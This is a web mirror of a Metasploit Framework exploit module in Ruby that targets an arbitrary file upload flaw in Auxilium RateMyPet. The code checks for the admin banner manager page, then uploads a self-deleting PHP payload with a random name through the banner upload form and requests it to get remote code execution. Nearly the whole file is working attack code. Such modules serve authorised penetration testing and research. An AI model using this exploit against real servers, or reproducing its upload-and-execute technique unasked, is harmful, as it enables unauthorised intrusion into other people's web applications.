Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/http/auxilium_upload_exec.rb
19669 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::HttpClient
10
include Msf::Exploit::PhpEXE
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => "Auxilium RateMyPet Arbitrary File Upload Vulnerability",
17
'Description' => %q{
18
This module exploits a vulnerability found in Auxilium RateMyPet's. The site
19
banner uploading feature can be abused to upload an arbitrary file to the web
20
server, which is accessible in the 'banner' directory, thus allowing remote code
21
execution.
22
},
23
'License' => MSF_LICENSE,
24
'Author' => [
25
'DaOne', # Vulnerability discovery
26
'sinn3r' # Metasploit
27
],
28
'References' => [
29
['OSVDB', '85554'],
30
['EDB', '21329']
31
],
32
'Payload' => {
33
'BadChars' => "\x00"
34
},
35
'Platform' => %w{linux php},
36
'Targets' => [
37
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
38
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
39
],
40
'Privileged' => false,
41
'DisclosureDate' => '2012-09-14',
42
'DefaultTarget' => 0,
43
'Notes' => {
44
'Reliability' => UNKNOWN_RELIABILITY,
45
'Stability' => UNKNOWN_STABILITY,
46
'SideEffects' => UNKNOWN_SIDE_EFFECTS
47
}
48
)
49
)
50
51
register_options(
52
[
53
OptString.new('TARGETURI', [true, 'The base directory to the application', '/Auxiliumpetratepro/'])
54
]
55
)
56
end
57
58
def check
59
uri = target_uri.path
60
base = File.dirname("#{uri}.")
61
62
res = send_request_raw({
63
'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php")
64
})
65
if res and res.body =~ /\<title\>Pet Rate Admin \- Banner Manager\<\/title\>/
66
return Exploit::CheckCode::Detected
67
else
68
return Exploit::CheckCode::Safe
69
end
70
end
71
72
def upload_exec(base, php_fname, p)
73
data = Rex::MIME::Message.new
74
data.add_part('http://', nil, nil, "form-data; name=\"burl\"")
75
data.add_part('', nil, nil, "form-data; name=\"alt\"")
76
data.add_part(p, 'text/plain', nil, "form-data; name=\"userfile\"; filename=\"#{php_fname}\"")
77
data.add_part(' Upload', nil, nil, "form-data; name=\"submitok\"")
78
79
post_data = data.to_s
80
81
print_status("Uploading payload (#{p.length.to_s} bytes)...")
82
res = send_request_cgi({
83
'method' => 'POST',
84
'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php"),
85
'ctype' => "multipart/form-data; boundary=#{data.bound}",
86
'data' => post_data,
87
})
88
89
if not res
90
print_error("No response from host")
91
return
92
end
93
94
print_status("Requesting '#{php_fname}'...")
95
res = send_request_raw({ 'uri' => normalize_uri("#{base}/banners/#{php_fname}") })
96
if res and res.code == 404
97
print_error("Upload unsuccessful: #{res.code.to_s}")
98
return
99
end
100
101
handler
102
end
103
104
def exploit
105
uri = normalize_uri(target_uri.path)
106
uri << '/' if uri[-1, 1] != '/'
107
base = File.dirname("#{uri}.")
108
109
php_fname = "#{Rex::Text.rand_text_alpha(5)}.php"
110
111
p = get_write_exec_payload(:unlink_self => true)
112
113
upload_exec(base, php_fname, p)
114
end
115
end
116
117